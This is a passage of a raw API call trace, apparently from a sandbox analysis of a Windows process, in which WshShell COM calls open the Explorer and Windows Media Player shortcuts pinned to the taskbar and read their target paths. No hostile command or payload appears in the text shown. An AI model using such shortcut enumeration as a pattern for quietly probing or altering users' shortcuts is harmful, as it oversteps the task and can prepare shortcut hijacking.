ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2) returned 0x0 [0167.008] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.008] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.008] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x2851a8) returned 0x0 [0167.008] WshShell:IDispatch:Invoke (in: This=0x2851a8, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\explorer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.009] SysStringLen (param_1="C:\\Windows\\explorer.exe") returned 0x17 [0167.009] WshShell:IUnknown:Release (This=0x2851a8) returned 0x2 [0167.009] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.009] WshShell:IUnknown:QueryInterface (in: This=0x2851b8, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x2851a8) returned 0x0 [0167.009] WshShell:IDispatch:Invoke (in: This=0x2851a8, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\explorer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.009] SysStringLen (param_1="C:\\Windows\\explorer.exe") returned 0x17 [0167.009] WshShell:IUnknown:Release (This=0x2851a8) returned 0x2 [0167.009] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk")) returned 0x20 [0167.009] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk")) returned 0x20 [0167.009] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x7d [0167.009] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", nBufferLength=0x7d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", lpFilePart=0x0) returned 0x7c [0167.010] CoGetContextToken (in: pToken=0x5a0dba4 | out: pToken=0x5a0dba4) returned 0x0 [0167.010] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc10 | out: ppvObject=0x5a0dc10*=0x283d20) returned 0x0 [0167.010] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4, pExcepInfo=0x5a0df84, puArgErr=0x5a0df80 | out: pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2851e0, varVal2=0x0), pExcepInfo=0x5a0df84*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df80*=0x0) returned 0x0 [0167.013] WshShell:IUnknown:QueryInterface (in: This=0x2851e0, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da3c | out: ppvObject=0x5a0da3c*=0x2851f0) returned 0x0 [0167.013] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d9f0 | out: ppvObject=0x5a0d9f0*=0x0) returned 0x80004002 [0167.013] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d818 | out: ppvObject=0x5a0d818*=0x285200) returned 0x0 [0167.013] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x285200, ppTI=0x5a0d820 | out: ppTI=0x5a0d820*=0x5c3dcf8) returned 0x0 [0167.013] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c | out: ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c) returned 0x0 [0167.013] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.013] WshShell:IUnknown:Release (This=0x285200) returned 0x2 [0167.013] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.014] WshShell:IUnknown:AddRef (This=0x2851f0) returned 0x3 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d34c | out: ppvObject=0x5a0d34c*=0x0) returned 0x80004002 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d2fc | out: ppvObject=0x5a0d2fc*=0x0) returned 0x80004002 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d308 | out: ppvObject=0x5a0d308*=0x0) returned 0x80004002 [0167.014] CoGetContextToken (in: pToken=0x5a0d368 | out: pToken=0x5a0d368) returned 0x0 [0167.014] CoGetContextToken (in: pToken=0x5a0d77c | out: pToken=0x5a0d77c) returned 0x0 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7fc | out: ppvObject=0x5a0d7fc*=0x0) returned 0x80004002 [0167.014] WshShell:IUnknown:Release (This=0x2851f0) returned 0x2 [0167.014] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.014] CoGetContextToken (in: pToken=0x5a0de04 | out: pToken=0x5a0de04) returned 0x0 [0167.014] CoGetContextToken (in: pToken=0x5a0dd64 | out: pToken=0x5a0dd64) returned 0x0 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x5a0de34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0de30 | out: ppvObject=0x5a0de30*=0x2851e0) returned 0x0 [0167.014] WshShell:IUnknown:AddRef (This=0x2851e0) returned 0x3 [0167.014] WshShell:IUnknown:Release (This=0x2851e0) returned 0x2 [0167.014] WshShell:IDispatch:GetTypeInfoCount (in: This=0x2851e0, pctinfo=0x5a0de8c | out: pctinfo=0x5a0de8c) returned 0x0 [0167.014] WshShell:IDispatch:GetTypeInfo (in: This=0x2851e0, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0de88 | out: ppTInfo=0x5a0de88*=0x5c3dcf8) returned 0x0 [0167.014] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d98c | out: ppvObject=0x5a0d98c*=0x5c3dcf8) returned 0x0 [0167.015] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x8 [0167.015] CoGetContextToken (in: pToken=0x5a0dcac | out: pToken=0x5a0dcac) returned 0x0 [0167.015] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x9 [0167.015] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x8 [0167.015] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.015] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2) returned 0x0 [0167.015] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.015] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.015] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x2851e0) returned 0x0 [0167.015] WshShell:IDispatch:Invoke (in: This=0x2851e0, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.015] SysStringLen (param_1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned 0x38 [0167.015] WshShell:IUnknown:Release (This=0x2851e0) returned 0x2 [0167.015] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.015] WshShell:IUnknown:QueryInterface (in: This=0x2851f0, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x2851e0) returned 0x0 [0167.015] WshShell:IDispatch:Invoke (in: This=0x2851e0, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.015] SysStringLen (param_1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned 0x38 [0167.015] WshShell:IUnknown:Release (This=0x2851e0) returned 0x2 [0167.016] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk")) returned 0x20 [0167.016] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk")) returned 0x20 [0167.017] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x79 [0167.017] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", nBufferLength=0x79, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", lpFilePart=0x0) returned 0x78 [0167.018] CoGetContextToken (in: pToken=0x5a0dba4 | out: pToken=0x5a0dba4) returned 0x0 [0167.018] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc10 | out: ppvObject=0x5a0dc10*=0x283d20) returned 0x0 [0167.018] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4, pExcepInfo=0x5a0df84, puArgErr=0x5a0df80 | out: pDispParams=0x5a0dfc4*(rgvarg=([0]=0x5a0dfb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0dfa4*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x285218, varVal2=0x0), pExcepInfo=0x5a0df84*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0df80*=0x0) returned 0x0 [0167.021] WshShell:IUnknown:QueryInterface (in: This=0x285218, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0da3c | out: ppvObject=0x5a0da3c*=0x285228) returned 0x0 [0167.021] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d9f0 | out: ppvObject=0x5a0d9f0*=0x0) returned 0x80004002 [0167.021] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d818 | out: ppvObject=0x5a0d818*=0x285238) returned 0x0 [0167.021] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x285238, ppTI=0x5a0d820 | out: ppTI=0x5a0d820*=0x5c3dcf8) returned 0x0 [0167.021] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c | out: ppTypeAttr=0x5a0d814, pDummy=0x40e4bd9c) returned 0x0 [0167.021] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.021] WshShell:IUnknown:Release (This=0x285238) returned 0x2 [0167.022] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.022] WshShell:IUnknown:AddRef (This=0x285228) returned 0x3 [0167.022] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d34c | out: ppvObject=0x5a0d34c*=0x0) returned 0x80004002 [0167.022] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d2fc | out: ppvObject=0x5a0d2fc*=0x0) returned 0x80004002 [0167.022] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d308 | out: ppvObject=0x5a0d308*=0x0) returned 0x80004002 [0167.022] CoGetContextToken (in: pToken=0x5a0d368 | out: pToken=0x5a0d368) returned 0x0 [0167.022] CoGetContextToken (in: pToken=0x5a0d77c | out: pToken=0x5a0d77c) returned 0x0 [0167.022] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d7fc | out: ppvObject=0x5a0d7fc*=0x0) returned 0x80004002 [0167.022] WshShell:IUnknown:Release (This=0x285228) returned 0x2 [0167.022] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0167.022] CoGetContextToken (in: pToken=0x5a0de04 | out: pToken=0x5a0de04) returned 0x0 [0167.022] CoGetContextToken (in: pToken=0x5a0dd64 | out: pToken=0x5a0dd64) returned 0x0 [0167.022] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x5a0de34*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0de30 | out: ppvObject=0x5a0de30*=0x285218) returned 0x0 [0167.022] WshShell:IUnknown:AddRef (This=0x285218) returned 0x3 [0167.023] WshShell:IUnknown:Release (This=0x285218) returned 0x2 [0167.023] WshShell:IDispatch:GetTypeInfoCount (in: This=0x285218, pctinfo=0x5a0de8c | out: pctinfo=0x5a0de8c) returned 0x0 [0167.023] WshShell:IDispatch:GetTypeInfo (in: This=0x285218, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0de88 | out: ppTInfo=0x5a0de88*=0x5c3dcf8) returned 0x0 [0167.023] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d98c | out: ppvObject=0x5a0d98c*=0x5c3dcf8) returned 0x0 [0167.023] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x8 [0167.023] CoGetContextToken (in: pToken=0x5a0dcac | out: pToken=0x5a0dcac) returned 0x0 [0167.023] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x9 [0167.023] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x8 [0167.023] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x7 [0167.023] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0de8c, pDummy=0x44f89ed2) returned 0x0 [0167.023] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x633b0d8 [0167.023] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.023] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x285218) returned 0x0 [0167.023] WshShell:IDispatch:Invoke (in: This=0x285218, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0, pExcepInfo=0x5a0dfb0, puArgErr=0x5a0dfac | out: pDispParams=0x5a0dfe0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x5a0dfd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe", varVal2=0x0), pExcepInfo=0x5a0dfb0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0dfac*=0x0) returned 0x0 [0167.023] SysStringLen (param_1="C:\\Program Files (x86)\\Windows Media Player\\wmplayer.exe") returned 0x38 [0167.023] WshShell:IUnknown:Release (This=0x285218) returned 0x2 [0167.023] CoGetContextToken (in: pToken=0x5a0dbcc | out: pToken=0x5a0dbcc) returned 0x0 [0167.024] WshShell:IUnknown:QueryInterface (in: This=0x285228, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc3c | out: ppvObject=0x5a0dc3c*=0x285218) returned 0x0 [0167.024] WshShell:IDispatch:Invoke (in: This=0x285218, dispIdMember=1005, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, 